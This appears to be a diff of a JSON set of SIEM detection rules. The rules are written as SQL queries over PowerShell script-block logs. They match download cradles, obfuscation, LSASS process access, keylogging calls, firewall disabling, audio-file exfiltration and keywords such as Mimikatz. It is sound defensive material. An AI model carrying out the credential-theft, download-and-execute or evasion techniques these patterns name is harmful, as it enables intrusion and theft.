System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "status": "test", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ], + "falsepositives": [ + "Legitimate user creation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + ], + "filename": "posh_ps_create_local_user.yml" + }, + { + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": "posh_ps_enable_psremoting.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_audio_exfiltration.yml" }, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "status": "test", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1546.013" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", - "author": "frack113", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1565" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "author": "frack113", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", "status": "test", - "description": "Powershell use PassThru option to start in background", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "status": "experimental", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", - "status": "experimental", - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Enable Windows Remote Management", + "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 